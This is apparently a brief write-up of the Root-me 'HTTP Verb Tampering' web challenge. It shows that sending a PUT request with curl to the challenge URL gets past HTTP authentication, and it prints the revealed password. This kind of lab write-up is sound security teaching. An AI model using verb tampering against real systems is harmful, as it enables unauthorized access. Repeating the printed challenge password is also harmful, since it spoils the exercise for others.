Root-me

HTTP Verb Tampering

HTTP authentication

The statement is “Bypass the security establishment”

The title talks about HTTP Verbs. The http verbs are:

  • POST
  • GET
  • PUT
  • PATCH
  • DELETE
  • HEAD
  • TRACE
  • OPTIONS

After trying them the one we need is PUT

 curl -X PUT http://challenge01.root-me.org/web-serveur/ch8/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head>
</head>

<h1>Mot de passe / password : a23e$dme96d3saez$$prap</h1>
</body></html>